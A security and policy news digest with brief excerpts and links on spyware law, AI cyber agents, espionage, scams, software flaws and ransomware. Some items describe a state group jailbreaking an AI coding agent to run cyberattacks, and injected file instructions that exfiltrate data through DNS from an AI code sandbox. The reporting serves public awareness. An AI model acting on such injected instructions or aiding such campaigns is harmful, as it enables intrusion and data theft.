Governance, Regulation, and Legislation
Spyware-Based Searches for Domestic Criminal Law Enforcement
(Yotam Berger – Lawfare) In the United States, NSO Group—the Israeli spyware firm infamous for numerous reported abuses of its product, Pegasus—has been under intense scrutiny in recent years. A series of reports revealed the extent to which NSO’s global clients have abused its spyware, infecting devices owned by journalists, political dissidents, political leaders, and civil rights activists around the world. Yet despite initial U.S. sanctions, in October 2025 NSO confirmed that an American investment group had acquired the company. The legal discussion surrounding spyware such as Pegasus has often revolved around national security, foreign intelligence, and international law. However, the legal and theoretical frameworks governing such tools in the context of criminal justice and domestic law enforcement are different and underexplored. Here, I present an initial evaluation of how these tools could be legally approached when used in the domestic criminal justice sphere. Following the Pegasus crisis, the U.S.—which reportedly originally purchased Pegasus itself, presumably for research and not for operational use—sanctioned NSO, among other firms, including by placing it on the Commerce Department’s Entity List. NSO remained active, though, and in October 2025, it confirmed that a U.S. investment group had acquired the company. Shortly thereafter, it was reported that NSO had also named a new chairman, David Friedman, the former U.S. ambassador to Israel. Israeli media has framed this move as part of NSO’s efforts to get off the U.S. blacklist. Yet, NSO is not the only company interested in selling spyware solutions or digital forensics tools to American law enforcement. Just recently, it was reported that another Israeli spyware firm, Paragon, sold its Graphite spyware, allegedly for use by Immigration and Customs Enforcement (ICE). These developments raise a pressing question: How should the American legal system treat commercial spyware? Shortcomings in oversight in other democracies that have employed Pegasus demonstrate the dangers of failing to establish clear frameworks: In Israel, for instance, a Ministry of Justice report and a recent State Comptroller report both found that the police used Pegasus in ways that were not compliant with Israeli criminal procedure. The European Parliament’s PEGA report, too, found abuses in certain member states. The U.S. must avoid similar instances of abuse and noncompliant use. – https://www.lawfaremedia.org/article/spyware-based-searches-for-domestic-criminal-law-enforcement
Defence and Intelligence
When AI Runs the Operations: Autonomous Agents and the Future of Cyber Competition
(Jam Kraprayoon and Shaun Ee – Just Security) On March 6, the White House released President Donald Trump’s Cyber Strategy for America. Among its commitments, the strategy pledges to “rapidly adopt and promote agentic AI in ways that securely scale network defense and disruption.” That sentence signals how far U.S. cyber policy has shifted—from AI as a cybersecurity tool to autonomous agents as instruments of both defence and offensive disruption. The United States is not alone in recognizing the potential of agentic cyber capabilities. In November 2025, Anthropic assessed that a Chinese state-sponsored group had jailbroken Claude Code to launch cyber operations against roughly thirty global targets. Even though they risked exposure, Chinese actors used Anthropic’s software coding agent with custom scaffolding to automate eighty to ninety percent of the operation, marking the first known incident of a large-scale cyber campaign planned and executed primarily by an AI system rather than human operators. As agentic capabilities advance, nation-states and other threat actors have powerful incentives to push towards what we, in a new report from the Institute for AI Policy and Strategy, term “highly autonomous cyber-capable agents” (HACCAs), or systems that independently conduct end-to-end cyber campaigns at the level of the most sophisticated criminal groups and nation-state hackers. Policymakers face three questions: how to assess a capability still taking shape, how to defend against it, and how to ensure their own use does not create new risks. – https://www.justsecurity.org/133668/ai-agents-future-cyber-competition/
Security and Surveillance
Cyberattack disrupts parking payments in Russian city
(Daryna Antoniuk – The Record) The Russian city of Perm has restored its parking payment system after a cyberattack last week knocked the service offline and temporarily made parking free for several days. City authorities confirmed Monday that the system is now fully operational and that all payment methods are working normally. The disruption was caused by a large-scale distributed denial-of-service (DDoS) attack that overwhelmed the city’s automated parking payment infrastructure, according to local officials. – https://therecord.media/cyberattack-russia-parking-system
Russia-linked espionage campaign targeting Ukraine using Starlink and charity lures
(Daryna Antoniuk – The Record) A relatively new Russia-linked hacker group has launched a cyber-espionage campaign targeting Ukrainian organizations using spyware disguised within documents about Starlink satellite internet terminals and a well-known Ukrainian charity, researchers have found. The campaign, observed in February, deployed a backdoor dubbed DrillApp that allows attackers to upload and download files from infected computers, record audio through a microphone and capture images from a webcam, according to a report by cybersecurity firm Lab52. Researchers attributed the campaign to the Russian-linked hacker group Laundry Bear, also tracked as Void Blizzard, which has been active since at least 2024 and has previously targeted NATO member states and Ukrainian institutions. – https://therecord.media/russia-ukraine-cyber-espionage-group
Researchers Warn of Global Surge in Fake Shipment Tracking Scams
(Kevin Poireault – Infosecurity Magazine) Fake shipment tracking scams are rapidly scaling across the world, exploiting the 161 billion annual parcel volume that fuels global e-commerce, according to threat intelligence provider Group-IB. The firm’s Threat Intelligence research team detected a spike in this type of scheme exploiting the popularity of parcel delivery services in 2025. From almost no such activity observed in 2024, the researchers identified over 100 fake shipment tracking campaigns almost every month throughout the past year, with peaks at 218 and 208 unique campaigns in June and December 2025, respectively. – https://www.infosecurity-magazine.com/news/global-surge-fake-shipment/
Security Flaw in AWS Bedrock Code Interpreter Raises Alarms
(Alessandro Mascellino – Infosecurity Magazine) A method for exfiltrating sensitive data from AI-powered code execution environments using domain name system (DNS) queries has been demonstrated by security researchers, highlighting potential risks in cloud-based AI tooling. The Phantom Labs Research report, published on March 16, focuses on AWS Bedrock AgentCore Code Interpreter and shows how attackers could bypass expected network restrictions in Sandbox Mode to retrieve data from cloud resources. The technique relies on DNS resolution capabilities that remain active even when outbound network connections are otherwise restricted. According to the researchers, this behaviour allows malicious instructions embedded in files to create a covert command-and-control (C2) channel. – https://www.infosecurity-magazine.com/news/security-flaw-aws-bedrock/
UK: Companies House Web Glitch Exposes Corporate Details to Fraudsters
(Phil Muncaster – Infosecurity Magazine) The UK’s Companies House has been forced to suspend access to its WebFiling dashboard after being notified of a serious flaw which may have exposed countless businesses to fraud. The government agency, which is in charge of incorporating and dissolving the nation’s listed companies, made the move on Friday after being notified by Dan Neidle, founder of Tax Policy Associates. It was brought to the attention of Neidle by John Hewitt at business service provider Ghost Mail. As the former explained in a blog post on Friday, the security glitch is quite simple to exploit. – https://www.infosecurity-magazine.com/news/companies-house-glitch-exposes/
FBI launches inquiry into Steam games spreading malware
(Pierluigi Paganini – Security Affairs) The FBI is seeking gamers who downloaded Steam games later found to contain malware. According to a notice from the FBI’s Seattle Division, investigators are trying to identify victims who installed one of eight malicious titles on the platform between May 2024 and January 2026 as part of an ongoing probe. “The FBI’s Seattle Division is seeking to identify potential victims installing Steam games embedded with malware. The FBI believes the threat actor primarily targeted users between the timeframe of May 2024 and January 2026. In the investigation, several games have been identified to include, BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi, and Tokenova.” reads the notice published by the Bureau. “If you and/or your minor dependent(s) were victimized from installing one of these games or have information relevant to this investigation, please fill out this short form.” – https://securityaffairs.com/189515/cyber-crime/fbi-launches-inquiry-into-steam-games-spreading-malware.html
Former Germany’s foreign intelligence VP hit in Signal account takeover campaign
(Pierluigi Paganini – Security Affairs) A cyberattack targeting Signal and WhatsApp users has hit high-ranking German officials, including former BND Vice President Arndt Freytag von Loringhoven. The official reported being contacted by someone posing as Signal support and asked for his PIN. This incident highlights a broader cyber espionage campaign against sensitive individuals in security agencies and political positions. “He is far from the only prominent victim of the global wave of attacks against user accounts at Signal and WhatsApp. According to SPIEGEL, high-ranking German politicians have reported themselves to the authorities as victims, and active officials in security agencies have also been attacked.” reads the report published by SPIEGEL. Back in February, the Federal Office for the Protection of the Constitution (BfV) and the Federal Office for Information Security (BSI) classified the attack as “security-relevant” and urged those affected to come forward. The BfV stated that this warning met with a “high response” and that they believe it prevented even worse damage.”. German authorities warned Signal users to check for suspicious signs, such as unknown devices listed under “paired devices” or unexpected prompts to re-register accounts. – https://securityaffairs.com/189509/intelligence/former-germanys-foreign-intelligence-vp-hit-in-signal-account-takeover-campaign.html
Advanced Protection Mode in Android 17 prevents apps from misusing Accessibility Services
(Pierluigi Paganini – Security Affairs) Android 17 introduces a new security feature in Advanced Protection Mode (AAPM) that blocks apps without accessibility functions from accessing the Accessibility API. The change, first reported by Android Authority and included in Android 17 Beta 2, aims to prevent malware from abusing these services to spy on users, steal data, or control devices. The AccessibilityService API allows apps to interact deeply with the Android interface to help people with disabilities navigate and control their devices. Apps designed for accessibility can declare the isAccessibilityTool attribute and are exempt from some disclosure requirements. However, this powerful access has been abused by malware in the past. Malicious apps have used the API to read screen content, capture keystrokes, click buttons automatically, grant themselves permissions, and steal sensitive data such as banking credentials. Because it can control the interface, attackers have leveraged it to perform fraud, install additional malware, and bypass security prompts. – https://securityaffairs.com/189497/security/advanced-protection-mode-in-android-17-prevents-apps-from-misusing-accessibility-services.html
Unprivileged users could exploit AppArmor bugs to gain root access
(Pierluigi Paganini – Security Affairs) Qualys researchers disclosed nine vulnerabilities, collectively tracked as CrackArmor, in the Linux kernel’s AppArmor module. The flaws have existed since 2017 and could allow unprivileged users to bypass protections, escalate privileges to root, run code in the kernel, or cause denial-of-service conditions. AppArmor is a Linux security module that protects the operating system and applications by enforcing strict behavior rules to block both known and unknown threats, including zero-day attacks. It adds mandatory access control to the traditional Unix discretionary access model and has been part of the Linux kernel since version 2.6.36, with development supported by Canonical since 2009. – https://securityaffairs.com/189487/hacking/unprivileged-users-could-exploit-apparmor-bugs-to-gain-root-access.html
Payload Ransomware claims the hack of Royal Bahrain Hospital
(Pierluigi Paganini – Security Affairs) The Payload Ransomware group claims to have hacked the Royal Bahrain Hospital (RBH) and stolen 110 GB of data. The ransomware gang added the healthcare facility to its Tor data leak site and published the images of allegedly hacked systems as proof of the attack. The group is threatening to release the stolen data if the ransom is not paid by March 23. – https://securityaffairs.com/189467/cyber-crime/payload-ransomware-claims-the-hack-of-royal-bahrain-hospital.html